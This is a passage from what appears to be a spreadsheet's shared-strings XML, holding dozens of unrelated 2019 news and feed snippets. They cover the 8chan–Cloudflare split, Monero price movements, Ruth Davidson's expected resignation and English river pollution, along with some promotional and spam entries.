    <t>Dutch Vietnamese Dictionary – travel dictionary to translate Dutch to Vietnamese. Click on the list to show Dutch or Vietnamese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Dutch Vietnamese Dictionary →</t>
  </si>
  <si>
    <t>The launches came after Donald Trump said he received a “very beautiful letter” from Kim Jong-un. The post North Korea fires two missiles into the sea after Trump letter appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Key Highlights Monero’s XMR fell by 0.57% on Monday. Partially reversing a 2.47% fall from Sunday, Monero’s XMR ended the day at $91.17. An early morning intraday high $91.88 saw Monero’s XMR fall well short of the first major resistance level at $93.36. A mid-day intraday low $90.08 saw Monero’s XMR fall through the first major support level at $90.49. The extended bearish trend, formed at late April 2018’s swing hi $298, remained firmly intact. The July reversal through the 23.6% FIB of $99 reaffirmed the extended bearish trend after Monero’s XMR had continued to fall short of the 38.2% FIB of $137. How to Buy Monero’s XMR" data-reactid="17"&gt;How to Buy Monero’s XMR Monero’s XMR Price Support Monero’s XMR fell by 0.57% on Monday. Partially reversing a 2.47% gain from Sunday, Monero’s XMR ended the day at $91.17. A mixed start to the day saw Monero’s XMR strike an early morning intraday high $91.88 before hitting reverse. Falling well short of the first major resistance level at $93.36, Monero’s XMR fell to a mid-day intraday low $90.08. The pullback saw Monero’s XMR fall through the first major support level at $90.49 before finding support. Steering clear of sub-$90 levels, Monero’s XMR managed to bounce back to a $91.7 levels late in the day before easing back. On the day, avoiding a fall through to sub-$90 was key. For Monero’s XMR, the extended bearish trend formed at late April 2018’s swing hi $298 remained intact. The July fall back through the 23.6% FIB of $99 reaffirmed the extended bearish trend, following 15th December’s swing lo $37.18. Ahead of the pullback, Monero’s XRM had also failed to break through the 38.2% FIB of $137 to take a run at the 62% FIB of $198. For the bulls, a move back through to $115 levels would be needed to support a run at $140 levels. A move through the 38.2% FIB would see Monero’s XMR form a near-term bullish trend. At the time of writing, Monero’s XMR was down by 0.52% to $90.70. A bearish start to the day saw Monero’s XMR fall from a morning high $91.64 to a low $90.70. Monero’s XMR left the major support and resistance levels untested early on. For the day ahead Monero’s XMR would need to move back through the morning high $91.64 to take a run at the first major resistance level at $92. Support from the broader market would be needed, however, for Monero’s XMR to break through to $91 levels. Barring a broad-based crypto rally, Monero’s XMR would likely come up short of $93 levels on the day. Monday’s high $91.88 and the first major resistance level at $92 would likely limit any upside. Failure to move through the morning high could see Monero’s XMR fall deeper into the red. A fall through the morning low $90.70 would bring the first major support level at $90.21 into play. Barring an extended crypto sell-off, however, Monero’s XMR should steer clear of sub-$90 support levels on the day. Looking at the Technical Indicators Major Support Level: $90.21 Major Resistance Level: $92.01 23.6% FIB Retracement Level: $99 38.2% FIB Retracement Level: $137 62% FIB Retracement Level: $198 Please let us know what you think in the comments below. Thanks, Bob article was originally posted on FX Empire" data-reactid="49"&gt;This article was originally posted on FX Empire More From FXEMPIRE:</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized Jensen Phelan Law Firm PC | www.prescottperso… | Prescott, AZ | Accident and Injury Lawyers Source by page1solutions</t>
  </si>
  <si>
    <t>Police investigate an assault allegedly involving the Finsbury Park attacker and a fellow prisoner. Read more? Click here</t>
  </si>
  <si>
    <t>Image caption 8chan will likely be targeted by cyberattacks seeking to knock it offline The far-right web forum 8chan, used to celebrate mass shootings and spread suspects’ so-called “manifestos”, has been forced offline after losing its cyber-security protection. Cloudflare, a San Francisco-based firm that provides added security for websites to prevent cyber-attacks, said it would stop protecting 8chan at midnight Pacific Time (08:00 BST) on Monday. The 21-year-old suspect in this weekend’s shooting in El Paso, Texas, is understood to have used 8chan to spread his manifesto. Previously, the site was also used by the suspect in March’s shooting in Christchurch, New Zealand, as well as the suspect in April’s synagogue shooting in Poway, California. Losing Cloudflare’s protection has made 8chan vulnerable to a Distributed Denial of Service (DDoS) attack, whereby a website is bombarded with traffic that overwhelms its servers, rendering it inaccessible. A few minutes after the Cloudflare service was withdrawn, 8chan did indeed become unavailable. However, 8chan’s site administrator says it was movingto another security firm, BitMitigate, based in the US state of Washington. BitMitigate’s website says it has “a proven commitment to liberty”. BitMitigate stepped in to help net-Nazi site the Daily Stormer when it lost Cloudflare protection in 2017. The BBC has approached BitMitigate for comment. But at this time 8Chan remains offline. Cloudflare chief executive Matthew Prince had said, in the wake of Saturday’s shootings, that his firm would continue to support 8chan as its policy was to remain neutral over the type of content the service protected. However, on Sunday evening Mr Prince wrote in a blog post that “8chan has repeatedly proven itself to be a cesspool of hate”. “They have proven themselves to be lawless and that lawlessness has caused multiple tragic deaths,” Mr Prince wrote. “Even if 8chan may not have violated the letter of the law in refusing to moderate their hate-filled community, they have created an environment that revels in violating its spirit.” Mr Prince warned that while 8chan would be disrupted by Cloudflare’s decision, it would likely be able to rebuild itself – as was the case when Cloudflare stopped providing protection for the Daily Stormer, a neo-Nazi site, in 2017. “They quickly came back online using a Cloudflare competitor,” Mr Prince wrote. “That competitor at the time promoted as a feature the fact that they didn’t respond to legal process. He added: “I have little doubt we’ll see the same happen with 8chan. While removing 8chan from our network takes heat off of us, it does nothing to address why hateful sites fester online. It does nothing to address why mass shootings occur. It does nothing to address why portions of the population feel so disenchanted they turn to hate. “In taking this action we’ve solved our own problem, but we haven’t solved the Internet’s.” 8chan is a forum created in 2013 by Fredrick Brennan as an alternative to 4chan, a message board popular with gamers. 8chan promised less moderation of controversial topics and images that were being removed from 4chan. As such, 8chan has hosted far-right extremist views and imagery. Mr Brennan gave up ownership of 8chan in 2015 and has since called for it to be shut down. Following Cloudflare’s announcement, he wrote on Twitter: “Thank you so much @CloudFlare Finally this nightmare might have an end.” 8chan is now owned and run by Jim Watkins, a former US army veteran, believed to be living in the Philippines. Image copyright Getty Images Image caption Cloudflare chief executive Matthew Prince said in the past he should not have the power to essentially force sites off the internet What is Cloudflare? The San Francisco-based company protects websites from attacks, as well as making websites load more quickly for legitimate users. It can be thought of as a kind of bouncer or security guard for websites that get a large amount of traffic, or may be a likely target of cyber-attacks. Cloudflare’s technology is able to verify where internet traffic is coming from, i.e. distinguishing whether the visitor is a genuine person, or a network of automated bots that is being used to flood a website. It is meant to block any attempts from “bad” traffic getting through. Cloudflare provides protection for more than 12 million websites, and is expected to float on the stock market later this year. Chief executive Matthew Prince has expressed concern at the power his company has to decide whether or not a website is able to exist on the open internet. _____ Follow Dave Lee on Twitter @DaveLeeBBC Do you have more information about this or any other technology story? You can reach Dave directly and securely through encrypted messaging app Signal on: +1 (628) 400-7370</t>
  </si>
  <si>
    <t>Andrew Agnoli, Head of the Academy at Topgolf By Andrew Agnoli, Topgolf’s Head of Academy As Head of the Academy at Topgolf, it’s my job to show fans of Topgolf that golf really can be ‘Everyone’s Game’, and that playing ‘proper golf’ on a course isn’t just for the select few. Here are some of the ways we’re doing that in 2019. We’re widening the appeal of golf This summer we’ve seen a record number of juniors take part in Junior Camps, our fun way for kids of all ages to get involved with golf in the school holidays. These new golfers will be key to the future of golf and will quite often introduce their parents to the game too. We’re also working with the PGA to offer novice female golfers an informal taster session through their We Love Golf campaign. On 17th September, we have spots for 100 women and girls to start learning the basics of the game in a relaxed group environment. Golf has famously been seen as very anti-female in the past, and we want to do everything in our power to help change that image. We’re innovating to get people to the course Attendees of this taster session will be among the first to be offered the chance to learn more through our new ‘Bays to Fairways’ programme. When it launches, the programme will teach key golf (and Topgolf) skills in a series of fun, game-based sessions, with the ultimate goal to get participants comfortable with playing on a course. Look out for much more on this soon. Our pros are developing young talent – and it’s working Chigwell Head Professional Richard Smith coaches a number of talented young golfers, including Topgolf success story Lily May Humphreys. After an incredible 2019 to date, next month will see Lily taking part in the Junior Solheim Cup. Richard has had further international success with 13-year-old Sam Epstein who was recently selected to represent Europe. To help build this level of accomplishment at Topgolf, these elite golfers have had access to not only the best coaching, but the best equipment too. The Academy at each Topgolf venue features ball flight monitors, pressure mats and video analysis as part of the standard lesson offering. Our pros are getting recognition Two Topgolf Head Professionals have recently been recognised by The PGA for their service to the golf industry. Jamie Savory of Topgolf Surrey has been awarded Advanced PGA Professional status, and David Meaney Fellow PGA Professional status. As well as the hard work and dedication of the individuals involved, these accolades have been presented as a result of our innovative approach to growing the game. This year continues to see improvements for all in the Topgolf Academy — we’ve never had more enquiries for lessons, but our aspirations don’t stop there. Our Professionals continue to show commitment to grow the game and make it fun for every guest. I can’t wait to see what the rest of the year brings. Interested in joining the Academy team? Find out more. https://topgolf.com/uk/company/pga-pro-recruitment/ Topgolf UK https://www.topgolf.com/uk/ Andrew Agnoli When PGA Pro and sports nutrition expert Andrew Agnoli isn’t coaching golf students and devising dietary plans for clients, you can find him walking his two dogs in the Suffolk Countryside and keeping tabs on football transfer rumours. Source link</t>
  </si>
  <si>
    <t>Delvin Williams a former Pro Bowl running back for the 49ers, Dolphins, and Packers, sued the National Football League on July 23 claiming that the NFL has failed to provide retirement and disability benefits. Source: Sports Business News</t>
  </si>
  <si>
    <t>Sunrise On The Coast Sunrise On The Coast - Another morning and I'm out again to photograph another sunrise on the coast. In this video I'm photographing waves on rocks as well as photographing the sunrise, and when it comes to waves, shutter speed matters. I hope you enjoy the video The post Sunrise On The Coast appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>A woman was led to safety from the waters of the Tay in the early hours of today.</t>
  </si>
  <si>
    <t>Adam Hadwin shot a five-under 67 to open the BMW Championship at Medinah on Thursday. That left Hadwin tied for eighth going into Friday’s second round and projected to 40th place in FedEx Cup standings, leaving him with work left to do over the final three rounds, with the top 30 in the standings making […]</t>
  </si>
  <si>
    <t>Agriculture’s gross domestic product in Canada could reach $51 billion by 2030, up from $32 billion today, but a report released on Wednesday by RBC says the right investments in people and technology need to be made. It said Canada must embrace a skills agenda and boost innovation to capitalize on the rising demand for agricultural products around the world. “Within the coming decade, there will be about nine billion people to feed around the world – over one billion more than today,” said John Stackhouse, senior vice-president at RBC, in a news release. “Our sector is well-positioned to supply the rising demand. Canada is consistently ranked one of the world’s top five exporters, and we anticipate trade agreements with Europe, the United States and the Pacific Rim region will enable our producers to tap into large and fast growing markets. “Feeding a hungry world presents a historic opportunity for Canada if we can figure out how to better match people, capital and innovation in the agriculture space. We believe Canada can once again be an agriculture superpower, and do it in a way that cuts greenhouse gas emissions, and supports thousands of communities that still help to define our country.” But the report said the current shortage of Canadian agriculture workers is expected to grow to an estimated 123,000 positions by 2030 and new skills are required to manage the farm of the future, as automation and new and emerging technologies become as essential to farming as water or fertilizer. “These challenges are exacerbated by a number of structural issues. Canada’s rural population growth has remained flat for the past 30 years, which makes it harder to address labour shortages. Additionally, the bulk of the sector’s capital is held in large, illiquid assets such as farmland and barns. And high operating costs hamper a producer’s ability to invest in new technologies. These and other factors have resulted in uneven adoption and usage of advanced technologies across the country,” said RBC. The report urges: the federal government to convene a national skills strategy for agriculture, together with employers, workers, educators and industry groups, to plan for future labour needs; industry groups to coordinate efforts on a bold campaign to attract and retain more youth, women, Indigenous people and new Canadians in agriculture; Canada’s work-integrated learning strategy to incorporate agriculture as a key sector, to increase exposure for non-agriculture students across the agri-food industry; ensure all major research and development initiatives, such as the Protein Supercluster, are linked to education and skills development; the federal government should reduce barriers to high skilled immigration to agriculture, and consider a dedicated service channel under the Global Skills Strategy; accelerate the development of industry-wide data governance standards, in accordance with Canada’s Digital Charter, to increase access to the best data and insights on food production; fulfil the federal commitment to provide high-speed Internet to the remaining 1.5 million rural and remote households within 10 years, giving them access to online learning and cloud computing; learn and apply lessons from countries like the Netherlands, Australia and Israel on approaches to agricultural human capital; recognize agriculture’s centrality to Canada’s future health and prosperity. Mario Toneguzzi is a Troy Media business reporter based in Calgary. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Canadian agriculture could be a $51-billion economic driver: RBC appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Justin Dallaire</t>
  </si>
  <si>
    <t>A pilot with Heaps Estrin Real Estate sees the luxury automaker place high-end vehicles in the driveway of open houses. Read More</t>
  </si>
  <si>
    <t>Co-founder of workplace equity startup Work180 says she wanted to discuss her pregnancy as she pitched for capital.</t>
  </si>
  <si>
    <t>VOLANS-AU</t>
  </si>
  <si>
    <t>Volans Aluminium USB 3.1 Gen 2 (10Gbps) Type C to M.2 PCIe NVMe SSD Enclosure This compact M.2 PCIe NVMe SSD enclosure lets you add highly portable data storage to any laptop or computer with a USB-C™ port – such as MacBook, Chromebook Pixel™, Dell™ XPS laptops, and many others. It turns your M.2 drive into a high-speed storage solution over a USB 3.1 Gen 2 connection, at up to 10Gbps throughput. Features Designed for M Key or B+M Key based on PCIe NVM Express (NVMe) M.2 SSDs only Support USB Super-speed Gen2(10Gbps) / Super-speed Gen1(5Gbps)/High-speed(480Mbps)/Full-speed(12Mbps) operation. Support windows 2000/XP/ VISTA /7/8/10, Mac10.x, Linux 2.4.2 and above Supports M.2 modules in format 2280, 2260, 2242 and 2230, up to 2TB Fits size：3022mm/4222mm/6022mm/8022mm LED power/status indicators Easy installation WEBSITE: https://www.volans.com.au/product/vl-ucm2/</t>
  </si>
  <si>
    <t>F.Charm – Mi-e dor (Videoclip Oficial) download video F.Charm – Mi-e dor (Videoclip Oficial) fullhd download youtube review F.Charm – Mi-e dor (Videoclip Oficial) down show to F.Charm – Mi-e dor (Videoclip Oficial) where... The post F.Charm – Mi-e dor (Videoclip Oficial) appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Zimbabwe's prisons are overcrowded and are currently accommodating 19 500 inmates, above a carrying capacity of 17 000, a cabinet minister said Wednesday. The government, however, said it is not considering any amnesty to de-congest the correctional facilities, the state news agency New Ziana reported. Early last year, President Emmerson Mnangagwa pardoned at least 3 000 prisoners</t>
  </si>
  <si>
    <t>WATCH: A quick look at the weather across the world.</t>
  </si>
  <si>
    <t>Brittany Henriques</t>
  </si>
  <si>
    <t>According to e-scooter company Lime, measures are currently put in place to help resolve issues Montrealers have been having with the scooters.</t>
  </si>
  <si>
    <t>Australian shares are poised to slide on Thursday despite a strong session on Wall Street overnight that saw the Dow Jones add 1 per cent.</t>
  </si>
  <si>
    <t>Openview Promo: (Intelsat 20 (IS-20) 68.5E, 2019-08-24 10:01)… KingOfSat News The post Openview Promo: (Intelsat 20 (IS-20)) appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Huntington Beach, California Consumer Credit Counseling Service | (888) 551-1270 Sunday 04 August 2019 05:03 PM UTC-05 | Tags: huntington-beach-california-consumer-credit-counseling-service-888-551-1270 https://youtu.be/yqEgN1CaanU Huntington Beach, California Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Huntington Beach, California Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Huntington Beach, California Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Huntington Beach, California individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCqFSDDQNMeoCiHOGA0-O9xQ/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151303848184569856 Tags: huntington-beach-california-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Musician Rob Scallon teamed up with fellow musician Mary Spender to perform an acoustic cover of The Beatles song “Come Together” on an amazing double sided-guitar. Scallon played the guitar side, while Spender played bass and sang’ .</t>
  </si>
  <si>
    <t>A man gathering firewood on the shores of western Alaska found a perfectly pristine 50-year-old message in a bottle from a Cold War Russian sailor. Tyler Ivanoff found the handwritten letter near Shishmaref, about 600 miles northwest of Anchorage. “I was just looking for firewood when I found the bottle,” Tyler Ivanoff said. “When I found the bottle, I had to use a screwdriver to get the message out.“ Ivanoff shared his discovery on Facebook where Russian speakers translated the message to be a greeting dated June 20, 1969. “Sincere greetings! From the Russian Far East Fleet mother ship VRXF Sulak.I greet you who finds the bottle and request that you respond to the address Vladivostok -43 BRXF Sulak to the whole crew. We wish you good health and longyears of life and happy sailing. 20 June 1969.” Reporters from the state-owned Russian media network, Russia-1, tracked down the original writer, Captain Anatolii Prokofievich Botsanenko. He was skeptical he wrote the note until he saw his signature on the bottom. “There ― exactly!” he exclaimed.The message was sent while the then 36-year-old was aboard the Sulak, Botsanenko said. Botsanenko shed tears when the Russian television reporter told him the Sulak was sold for scrap in the 1990s. Botsanenko also showed the reporter some souvenirs from his time on the ship, including the autograph of the wife of a famous Russian spy and Japanese liquor bottles, the latter kept over his wife’s protests. Ivanoff’s discovery of the bottle was first reported by Nome radio station KNOM. REAL LIFE. REAL NEWS. REAL VOICES. Help us tell more of the stories that matter from voices that too often remain unheard. Source link</t>
  </si>
  <si>
    <t>Ever wondered what goes on inside the Red Bull factory? We asked Christian Horner to give us the tour – including the place ace designer Adrian Newey finds his inspiration… For more F1® videos, visit http://www.Formula1.com Like F1® on Facebook: https://www.facebook.com/Formula1/ Follow F1® on Twitter: http://www.twitter.com/F1 Follow F1® on Instagram: http://www.instagram.com/F1 source The post F1 Exclusive: Christian Horner's Red Bull Factory Tour appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>egodrip</t>
  </si>
  <si>
    <t>For all those Boozebud users out there, this is a good deal for already cheap prices for Glenlivet Scotch Whisky products. Any purchase of a Glenlivet 700mL bottle with receive a free 50mL taster worth $14.99.</t>
  </si>
  <si>
    <t>Ryan Lippert</t>
  </si>
  <si>
    <t>Steelers fans, the time is finally here! We get our first look at our 2019 Pittsburgh Steelers against another colored jersey. There has been a lot of intrigue in training camp and things have looked good but we all know none of that matters until you line up against another team. Pittsburgh will face off […] Scouting The Tampa Bay Buccaneers: Steelers Preseason Week 1 appeared first on Steel City Underground.</t>
  </si>
  <si>
    <t>Sam Kul planned to bring four kilograms of cocaine into Australia but needed to know some important information first.</t>
  </si>
  <si>
    <t>Australian Survivor’s sneaky supermodel David Genat was finally eliminated from the game during Monday’s episode, suffering a “massive blindside” so severe he even left with an unplayed immunity idol in his pocket.</t>
  </si>
  <si>
    <t>Stacey Lee And Eugene Boisvert</t>
  </si>
  <si>
    <t>Adelaide woman Sabrina Lekaj's family pays tribute to a studious daughter and a sweet sister whose life tragically came to an end two weeks ago.</t>
  </si>
  <si>
    <t>The United States and Japan have agreed "in principle" to core elements of a trade deal that US President Donald Trump and Prime Minister Shinzo Abe said they hope to sign in New York next month.</t>
  </si>
  <si>
    <t>Media playback is unsupported on your device Media captionMelissa Compton became seriously ill while swimming the length of the River Severn Targets for 75% of rivers to be healthy by 2027 are “very unlikely” to be met in England, a charity has warned. The World Wide Fund for Nature (WWF) says rivers are “used as open sewers”. The Environment Agency predicts 75% of rivers in England and along the Scottish and Welsh borders will meet EU expectations by 2027, compared with just 14% now. It is planning an autumn consultation on “challenges and choices” faced in cleaning up water. The agency said it would review the target based on “what can realistically be achieved”. Dr Andrew Singer, senior scientist at the Centre for Ecology and Hydrology, said: “There is no river in the UK that is safe to be swimming in. “We have so many sewage works that are on a river that even if you treated it perfectly, you would still have enough pathogens coming out of a well-operated sewage works that you wouldn’t want to swim in the river.” ‘You could taste it’ Image copyright Melissa Compton Image caption Melissa Compton became ill while swimming 220 miles of the River Severn for charity Melissa Compton was taken to hospital after “swallowing sewage” during a 220-mile swimming challenge in the River Severn. The 39-year-old was taken ill in Gloucester in June, having already suffered hypothermia and fatigue while swimming to raise money for charity. “It was grey, it was very murky, there was a lot of debris in the water and then you could see evidence on the side of what looked like toilet roll,” said the nurse, who works in Shrewsbury. “You could taste it and see the debris on the surface.” She believes the government should put more funding into cleaning up rivers and waterways. “It’s 2019, we should be able to clean up all of the waste that we produce.” Image copyright Getty Images Image caption The Thames is the most polluted river basin district in England The European Union (EU) asked nations to grade rivers between poor, moderate, good and high. Governments should aim for rivers to be “good” – meaning relatively unaffected by human activity. “High” refers to upland streams in sparsely-populated areas. Under its Water Framework Directive the EU set a target for all rivers to be “good” by 2027 but exceptions were allowed if the cost of doing so would be too high. The UK government has aimed for 75% of rivers to be in good health “as soon as is practicable”, according to its 25-year environment plan. As of the latest data available just 14% of rivers in England were in good health. By 2021 the Environment Agency currently predicts 19% of rivers to be “good”, rising to almost 75% by 2027. But the WWF said this was “very unlikely” to be achieved without tougher regulation and work to restore rivers to a more natural state. Media playback is unsupported on your device Media captionWho makes sure our tap water is clean? Dave Tickner, chief freshwater adviser at WWF, said: “Our rivers are the lifeblood of the countryside – vital for wildlife and people, as well as our economy. “As we prepare to leave the EU, the UK Government must fast-track flagship legislation to better protect and restore our waterways and invest in effective monitoring and enforcement to ensure water companies and agricultural industry can no longer use our rivers as open sewers.” The Department for the Environment, Food and Rural Affairs (Defra) stressed it would “not weaken any of our high environmental standards when we have left the EU” and would look to enhance them further. ‘Someone took their eye off the ball’ Image copyright Environment Agency Image caption Environment Agency officers are investigating the deaths of an estimated 10,000 fish following a pollution spill in Devon The Environment Agency believes about 10,000 fish were killed by an agricultural waste spill in the River Mole in north Devon at the beginning of August. Roach and trout were among the fish that died when a chemical-based pollutant got into the river. While the agency said it took such incidents “very seriously” and was investigating, it has been accused of not doing enough to prevent such incidents from happening. Feargal Sharkey, former lead singer of The Undertones, said: “Someone took their eye off the ball.” Mr Sharkey, who is a fly fisherman and chairman of Amwell Magna Fishery in Hertfordshire, campaigns for better management of rivers. He said it was “outrageous and abominable” that 86% of rivers in England were not in good health. Image caption Feargal Sharkey said river pollution is a “failure of environmental regulation in this country” The Environment Agency said its teams “urgently investigated” the cause of pollution on the River Mole and “prevented further pollutant from entering the stream, as well as restoring oxygen levels to protect wildlife”. It tweeted to say it believed the the incident, reported on 2 August, to be “the largest ever fish kill in Devon and Cornwall”. A few days later 3,000 trout and bullheads died as a result of pollution in the River Sheppey in Somerset. You may also be interested in: Where are the best and worst rivers? Just 3% of rivers in the Thames basin district, which stretches from the Cotswolds and Northamptonshire through London to Kent and Hampshire, were in good health at the last reported check. Solway Tweed, which covers parts of Cumbria, Northumberland and the Scottish borders, has the largest proportion of good rivers, 43%, and is currently predicted to be 99% good by 2027. The data also covered parts of Wales where rivers crossed the English border. Just 10% of river water in the Dee basin district, which runs from Snowdonia in Wales to Chester, was good in 2016 but this is predicted to be 50% by 2027. The data does not cover the rest of Wales and Scotland or Northern Ireland, which have their own devolved environment bodies. Your questions answered We asked for your questions about this story and these are some of the things you wanted to know: If I am concerned about my local river, who do I contact? For rivers in England, the Environment Agency has an incident hotline for people who want to report pollution to water as well as blocked rivers, flooding or dead fish. The 24-hour number is 0800 80 70 60. People in the rest of the UK can contact Natural Resources Wales, the Scottish Environment Protection Agency and the Northern Ireland Environment Agency. How do I know whether my local river is clean enough to swim in? The Environment Agency only provides ratings on designated bathing waters, usually the sea or lakes. It does not make a judgement on whether rivers are clean enough for swimming, only whether they are good, moderate or poor for wildlife. How can we make a difference? There are various charities working to look after rivers. The South East Rivers Trust, for example, says it uses volunteers to help with “river restoration and cleanups to pollution busting and river monitoring”. The Rivers Trust has volunteers to “plant trees, litter pick, remove invasive species or test the water quality” of rivers. Water company efforts ‘unacceptable’ Image copyright Environment Agency Image caption Hundreds of fish were killed in Maidenhead in a pollution incident that saw Thames Water fined £607,000 Water companies have been told their efforts to protect the environment are “simply unacceptable”. The Environment Agency recorded 1,623 sewerage pollution incidents in England in 2018, four fewer than the year before. These were cases in which water companies discharged raw sewage into the environment, something they should only do during extreme rainfall. Southern Water was hit with a record £126m punishment for spills from its sewage plants and misreporting its performance. In July Thames Water was fined £607,000 for two incidents that saw millions of litres of raw sewage released in Maidenhead in 2014. ‘Zero tolerance’ Dr Singer said there needed to be “zero tolerance” of sewage pollution and a programme of “habitat restoration” to make rivers fit for different types of wildlife again. “By conceding that 25% of rivers will not meet good ecological status the government is recognising some rivers have deteriorated so far that they need this kind of work to have a chance of getting there. “I’m not aware of any implementation plan to achieve that 75% good status. If they could do it in such a short space of time, why not do it now?” A spokesman for the Environment Agency said it would look at “what can realistically be achieved by 2027 as part of the work to update the river basin managements to be published in 2021”. He said water quality was now “better than at any time since the industrial revolution” and the agency was “taking robust enforcement action against those who pollute our waters”. A spokesman for the water companies’ trade association, Water UK, said: “Water companies have spent around £25bn on environmental work since 1995 – action which has improved around 10,000 miles of rivers. It means wildlife is flourishing again, whereas 30 years ago Britain was known as ‘the dirty man of Europe’ due to badly polluted rivers.” He said the industry would spend another £5bn between 2020 and 2025 on environmental improvements. What questions do you have about this story? Use the form below to tell us and we could be in touch. If you are reading this page on the BBC News app, you will need to visit the mobile version of the BBC website to submit your question on this topic.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Misión de verificación se trasladará a El Naya Thursday 01 August 2019 04:13 AM UTC-05 | Tags: credit-counseling https://firmadeabogadosmedellin.blogspot.com/p/honolulu-hawaii-consumer-credit.html Habrá acompañamiento internacional Tags: credit-counseling</t>
  </si>
  <si>
    <t>Visit Alice Springs in Australia’s Northern Territory, an unforgettable adventure travel destination. The spellbinding landscapes of Tanami Desert, Simpson Desert and MacDonnell Ranges set the scene for a real outback adventure holiday. Quickly unpack in an Alice Springs accommodation option to suit your budget and style, and throw yourself into hot air ballooning, quad bike […] The post Travel Guide to Alice Springs, Northern Territory, Australia appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>An Adelaide court hears a man accused of endangering his ex-girlfriend's life by cutting the brake lines on her car was spotted underneath the vehicle by her housemate more than a year after their relationship ended.</t>
  </si>
  <si>
    <t>Image copyright Getty Images Image caption Ms Davidson has led the Scottish Conservatives for eight years Ruth Davidson is on the verge of quitting as leader of the Scottish Conservatives, BBC Scotland understands. Ms Davidson has been deeply unhappy with the prime minister’s pursuit of a possible no-deal Brexit. She is said to be considering her position, with a statement on her future likely to be made on Thursday. Ms Davidson, who gave birth to a son in October of last year, has been leader of the party since November 2011. Sources have told the BBC that Ms Davidson’s decision was based on a mixture of personal and political factors which have been building over recent months. And they insisted it was not a direct result of the announcement by Mr Johnson that he wants to suspend parliament in September – only a few weeks before the Brexit deadline of 31 October. The Scottish Daily Mail on Thursday quoted her as saying her time in frontline politics has taken a “toll” on her family and friends as well as herself. She said: “Those of us who are lucky enough to serve in political leadership accept the toll it takes but there’s always a part of us which can never accept the effect it has on family and friends too. “As we go forward to an incredibly turbulent time in UK and Scottish politics, I want to make clear the Scottish Conservative and Unionist Party is in great shape and will continue to hold the SNP to account “Scotland’s best interests will always be as part of the UK and everyone in the party – from the leader to our activists – are determined to make that case every day from now until the general election.” BBC Scotland’s political editor, Brian Taylor, said that he believed Ms Davidson has made her mind up to stand down on Thursday. He added: “She has been eight years as Conservative leader, during most of which she has driven the party and the Conservative cause forward. She was talked of at various points as being a potential prime minister and said herself the ambition was to be first minister. “But it would seem tonight she is, amid the turmoil of Brexit, resigning from both of those options.” Image copyright Getty Images Image caption Ms Davidson and Mr Johnson clashed in a TV debate ahead of the EU referendum The Scottish Sun, which broke the story, said it had been told by a senior Conservative source that juggling motherhood with politics had “taken its toll” on Ms Davidson, as had the “current political climate, where she’s found herself at increasing odds with the new leadership in London”. It is not yet known whether she will continue to serve as the MSP for Edinburgh Central, or will stand down completely from frontline politics. Ms Davidson backed Remain ahead of the EU referendum, and famously clashed with Mr Johnson in a live TV debate at Wembley before the vote – when she accused the Leave side of telling “untruths”. She publicly backed opponents of Mr Johnson in the Conservative leadership contest, and has previously said she would not support a no-deal Brexit. Ms Davidson was also said to have been angered by Mr Johnson’s decision to sack David Mundell – a close political ally of hers – as Scottish secretary and replace him with Alister Jack. Image copyright @ruthdavidsonmsp Image caption Ms Davidson and her partner Jen Wilson celebrated the birth of baby Finn in October of last year The 40-year-old was widely credited with turning around the fortunes of the Scottish Conservatives, with the party more than doubling its number of seats at Holyrood in the 2016 election – making it the second biggest party behind the SNP – and increasing its MPs from one to 13 in the 2017 general election. That relative success had seen her tipped as a future UK Tory leader, but she insisted she had no interest in the job – and that she was focused only on replacing Nicola Sturgeon as first minister of Scotland at the next Holyrood election in 2021. When she returned to the Scottish Parliament from maternity leave in May, she told BBC Scotland that it would be “tough to tear myself away from the wee man” but that “having a child and coming back to work is a part that lots of women play”. ‘Real blow’ Reacting to the news that Ms Davidson may quit, Scottish Labour Leader Richard Leonard said: “If the rumours are true then the loss of Ruth Davidson as leader of the Scottish Conservatives will be a real blow to her party. “This shows that even within his own ranks, Boris Johnson is already losing support and credibility. Scotland and the UK needs a general election as quickly as possible to oust him from Downing Street and elect a Labour government.” Scottish Liberal Democrat leader Willie Rennie said: “It’s no surprise Ruth Davidson has run out of reasons to stand by this dangerous and power hungry prime minister. “There must be lots of other like-minded conservatives who are horrified at this blatant abuse of power and can’t stomach being party to this destructive agenda any longer. They should take this as the signal to abandon ship.” Scottish Greens co-leader Patrick Harvie said: “It seems clear that Ruth Davidson and several of her senior colleagues at 